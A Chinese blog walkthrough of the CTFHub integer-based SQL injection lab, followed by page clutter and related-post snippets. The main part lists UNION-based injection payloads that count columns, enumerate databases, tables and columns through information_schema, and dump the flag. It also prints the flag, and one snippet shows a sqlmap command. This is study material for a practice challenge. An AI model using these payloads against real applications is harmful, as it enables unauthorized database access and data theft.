CTFHUB-SQL注入-整数型注入

最新推荐文章于 2024-08-14 08:00:00 发布

Pale1c

最新推荐文章于 2024-08-14 08:00:00 发布

阅读量220

点赞数

分类专栏： CTFHUB

本文链接：https://blog.csdn.net/u014794539/article/details/118495714

版权

sql web wp

CTFHUB 专栏收录该内容

15 篇文章 0 订阅

订阅专栏

整数型注入

考点 SQL注入-整数型注入

分析过程
输入 1试试

得到回显结果如上
由于已知是整数型所以直接判断列数
playload:

?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3

到3时无回显由此得出其有两列
然后查询库名
playload:

?id=-1 union select 1,database()

注：-1就是为了让union前面查询到的数据为空原回显数据干扰

得到库名此时可以爆出所有的数据库名
playload：

？id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

根据库名爆表名
playload：

?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"

然后去爆flag的字段
playload:

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"

爆出字段可以直接查询数据
playload:

?id=-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述
属于是得到flag

ctfhub{bcaeded8f931341200981ae4}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Pale1c

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTFHub_SQL整数型注入(超详解)

weixin_47443077的博客

07-26

1125

CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入！首先打开环境先尝试手注，已经说明是整数型，就直接查看字段数： -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显，说明字段数是2。接着判断显示位： -1 union select 1,2# 然后查看数据库： -1 union select database(),2# 接着获取sqli数据库中的表： -1 union select 1,grou

CTFHub SQL注入

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

02-09

1119

ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句，根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数首先使用order by 3 ，页面无回显，改为2之后页面显示正确。因此判断当前数据库当前表，共有2个字段。 3、使用联合查询，判断页面显示位首先将id改为一个不存在的纸，根据联合查询的特性，就会返回11111，222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数

参与评论您还未登录，请先登录后发表或查看评论

CTFHub-sql注入-整数型注入

qq_54537919的博客

07-22

913

CTFHub-sql注入-整数型注入

CTFHub~SQL注入超简单详细教程

最新发布

weixin_67832625的博客

08-14

878

本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解，让练习者对SQL注入有更详细的了解和深入，如有什么问题，随时联系作者

CTFHUB——整数型SQL注入

陈艺秋的博客

01-14

1343

整型SQL注入

CTFHub 整数型SQL注入

Leon~博客

03-08

5709

1、整数型SQL注入 （1）判断是否存在注入 1）加单引号 URL：http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql：select * from table where id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常； 2）加and 1=1 URL：http:...

CTFHUB-web-SQL注入

ookami6497的博客

11-29

818

CTFHUB SQL

CTFHUB-WEB-SQL注入

K_ShenH的博客

06-09

1237

CTFHUB-WEB-SQL注入

Ctfhub解题 web SQL注入(全部完整版)

weixin_46703850的博客

03-15

5491

Ctfhub解题 web SQL注入

Ctfhub-sql注入【整数型】

soysauce123的博客

08-03

1030

这样我们就很清楚一个库的库名，表名和字段名就可以直接查找里面的数据。先尝试看看一共有几列，当道三的时候发现不返回了说明只有两列。发现有老多库了，我们就大胆猜测从我们本来就在的库里面查找。于是使用函数获得此表里面的带有flag的字段名。小白承认这题对于我来说是一个练手的题目【嘿嘿】身为一名小白我们先预习一下今天要用到的知识。接下来就可以查询一下我们现在在什么库。我们肯定要的是flag里面的数据对吧。然后我们就可以输入flag通过本题啦。然后我们再尝试看看一共有什么库用到。欸，发现我们在sqli里面。.....

【ctfhub】sql整数型注入

hyhyxyx的博客

07-25

283

在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库（图三）【可判定此处有整数注入漏洞】

ctfhub SQL 整数型注入

qq_52671379的博客

06-21

355

SQL 整数型注入题目当输入值为1或2时有回显当输入3时无回显判断是否存在注入加单引号对应的id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，无回显。作为sql注入的小白，我决定不采用大佬们的方法，看不懂，先分享自己的方法，非常传统。由以上得知有两个字段，所以第一步，爆库名； '' union select 1,database() # 第二，爆表名； '' union select 1,group_concat(table_name) from information_

ctfhub Sql整数型注入

m0_64078007的博客

03-11

253

我们打开文件发现了它提示我们输入一个“1”，我们尝试输入。我们发现它可以有回显，根据它的提示我们尝试整数的注入类型。 select * from news where id = 1 and 1=1 select * from news where id = 1 and 1=2 当我们尝试到第三个时，它爆字段了。 ...

CTFHUB-整数型SQL注入

xixihahawuwu的博客

12-24

4510

CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入使用order by语句查询字段数参数为3时不回显，说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容，所以我们修改参数1为-1，使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,

CTFHub SQL 整数型注入[四步]

luminous_you的博客

12-04

460

判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se

CTFHub SQL注入 整数型注入

weixin_44732566的博客

02-12

3776

CTFHub SQL注入 整数型注入强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别，题目由易到难这题还是很基础的，有各种提示打开是源码，?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名，information_schema三步以下是详细步骤： ?id=1 or 1=1 union select 1,database() ...

CTFHUB(六)之整数型注入

ScyLamb的博客

03-03

261

直接跑sqlmap sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 看到可注入 sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs 下意识选了sqli sqlmap -u http://...

CTFHub技能树web（持续更新）--SQL注入--整数型注入

jiuyongpinyin的博客

08-12

237

整数型注入一道基本的SQL注入，先使用order by 语句判断有几列：发现有2列，使用联合查询语句：查看数据库： ?id=111 union select 1,database() --+ 查看列： ?id=111 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- 发现了有个flag的列，接下来查看这个列里面的字段： ?id=111 un